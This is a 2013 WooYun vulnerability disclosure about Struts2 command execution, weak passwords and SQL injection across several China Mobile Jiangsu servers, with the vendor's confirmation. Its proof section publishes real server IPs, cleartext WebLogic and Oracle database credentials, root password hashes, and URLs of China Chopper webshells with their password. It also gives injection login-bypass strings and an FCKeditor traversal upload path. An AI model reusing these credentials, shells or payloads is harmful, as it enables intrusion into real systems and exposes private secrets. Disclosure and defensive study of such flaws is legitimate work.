当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-024301

漏洞标题:江苏移动多个应用服务漏洞打包一览

相关厂商:江苏移动

漏洞作者: [email protected]

提交时间:2013-05-23 10:31

修复时间:2013-07-07 10:32

公开时间:2013-07-07 10:32

漏洞类型:命令执行

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-05-23: 细节已通知厂商并且等待厂商处理中
2013-05-25: 厂商已经确认,细节仅向厂商公开
2013-06-04: 细节向核心白帽子及相关领域专家公开
2013-06-14: 细节向普通白帽子公开
2013-06-24: 细节向实习白帽子公开
2013-07-07: 细节向公众公开

简要描述:

某Z同学跟我讲最近在某厂商做安服,并号称其负责的系统是“不可能”被战胜的。好吧 我怀着无比忐忑的心情检测了下对方的某些外网**服务器 一台又一台 眼都花了,懒得继续搞了.
以往大家不理解移动为何如此态度冷漠,其实这是因为体制问题,出现问题 就要有人担责,这不是闹着玩的. 某Z同学,看来这个六一你要陪我一起过了,有你的夏天不孤单。

详细说明:

江苏移动公网的一些服务器存在struts2远程命令执行问题,还有些有弱口令.

漏洞证明:

终端营销管理系统
证明:
http://221.178.251.187/hell.txt
weblogic-console登录帐密:
帐号:weblogic
密码:NgBoss12#
泄漏路径:
http://221.178.251.187/Plan.xml
网站路径:
/bosshome/websr/bea/applications/terminalbv
系统帐号:
websr:*:315:303::/bosshome/websr:/usr/bin/ksh
数据库帐密:
jdbc:oracle:thin:@10.32.122.21:1521:ecmdb
jdbc:oracle:thin:@10.32.122.22:1521:ecmdb2
用户名:smshall
密码:rTnA7bz1
========================================================================
终端便利店
证明:
http://bld.jswxcs.cn/resources/hell.txt
列目录:
http://bld.jswxcs.cn/resources/
网站路径:
/crmhome/DomainCMCVS/app/rec/cmcvs
系统帐号:
uid=306(weblogic) gid=306(weblogic) groups=16(dialout),33(video),306(weblogic)
========================================================================
智慧城市客源分析系统
证明:
http://221.178.251.189:8080/hell.txt
数据库帐密:
jdbc:oracle:thin:@10.32.233.39:1521:basrk
帐号:dtserv
密码:zj8tj7ik
shell:
http://221.178.251.189:8080/help/fuck.jsp 密码:chopper
========================================================================
移动家庭xxx系统
多系统弱口令:admin/admin +列目录漏洞
http://112.4.17.8:8080/
日志泄漏:(从日志中可以获取登录帐号和密码)
http://112.4.17.8:8080/HDCNew/Log/
例子帐号:13912345678 密码:1234
后台oracle注入:
用户名输入:13912345678'-- 密码随便即可登录成功
用户名输入:a'%20and%201=a-- 即暴出路径
/home/hdc/software/websoft/php-5.2.14/ext/pdo_oci/oci_statement.c:
========================================================================
移动乐视项目
证明:
http://cmisg.js.letv.com:8080/hell.txt
系统密码:
root:$1$1Cs8WSGs$X5CodN4V5.HKwQkzyhb0L/
ftplt 密码:letv123456
logftp:$1$hfYzWo25$y97IVITf/pbCpf0cX.9nr1
tomcat 密码:tomcat
ftpcdnc:$1$6ZyBaI42$PNv1VNgqi/C2rTfCFEx53/
hbimg:$1$lT4ORoab$PZPzfu6mCyNFctoNBTcb20
网站路径:
/letv/data/www/jstv
数据库:
jdbc:oracle:thin:@192.168.102.10:1521:iptv
帐号:iptv
密码:letv_iptv
jdbc:oracle:thin:@cre-PC:1521:cre
帐号:fisg
密码:fisg
shell:
http://cmisg.js.letv.com:8080/fuck.jsp 密码:chopper
========================================================================
移动外勤平台
证明:
http://112.4.17.110/hell.txt
任意目录浏览漏洞:
http://112.4.17.110/
FCKeditor任意文件任意目录上传:
http://112.4.17.110/ydwq/FCKeditor/editor/filemanager/browser/default/browser.html?type=../../&Connector=connectors/jsp/connector
系统帐密:
root:$6$5lr8fmIc$CjiaZvEMs.1dx1hFtKsn4F.o4Rgq.qJO9aufg7wY488AMZVfTZhBe8DxeK4b/MJVaNJKO1z8T5RyWeogs.o6x0:15827:0:99999:7:::
toptea:$6$lqhCzdFG$wN9Zqv5rr9NZJ3W39WJSMRCY4kFeV4EfQp.tnPNAXfllBLlrC2uKKGQyGEKlpiXTuXvBNrS79Z5bX7vv8gpUo.:15827:0:99999:7:::
数据库:
jdbc:oracle:thin:@10.33.136.102:1521:orcl
帐号:WXYY
密码:WXYY123
shell:
http://112.4.17.110/test/fuck.jsp 密码:chopper
========================================================================
移动行车无忧管理平台
弱口令:admin/123456
http://112.4.17.133:8080/Login.aspx

修复方案:

对于中间件的问题, 我建议最好大批量排查一下,不要报什么修什么.
当然 我知道说了句废话.

版权声明:转载请注明来源 [email protected]@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-05-25 21:16

厂商回复:

CNVD确认并复现所述多个漏洞情况,已在24日转由CNCERT作为重要事件协调中国移动集团公司处置。
按多个漏洞实例进行评分(比较多),rank 30

最新状态:

暂无